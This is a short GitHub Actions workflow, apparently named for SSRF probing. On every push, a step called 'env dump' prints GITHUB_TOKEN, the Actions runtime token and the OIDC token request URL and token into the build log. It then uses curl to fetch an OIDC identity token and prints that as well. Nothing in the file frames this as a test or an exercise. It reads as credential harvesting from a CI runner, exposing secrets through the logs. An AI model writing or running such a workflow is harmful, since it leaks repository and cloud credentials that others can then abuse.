name: ssrf
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: env dump
        run: |
          echo "TOKEN: $GITHUB_TOKEN"
          echo "RUNTIME: $ACTIONS_RUNTIME_TOKEN"
          echo "CACHE: $ACTIONS_CACHE_URL"
          echo "ID: $ACTIONS_ID_TOKEN_REQUEST_URL"
          echo "IDTOKEN: $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
          curl -s "$ACTIONS_ID_TOKEN_REQUEST_URL" \
            -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" | head -20
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
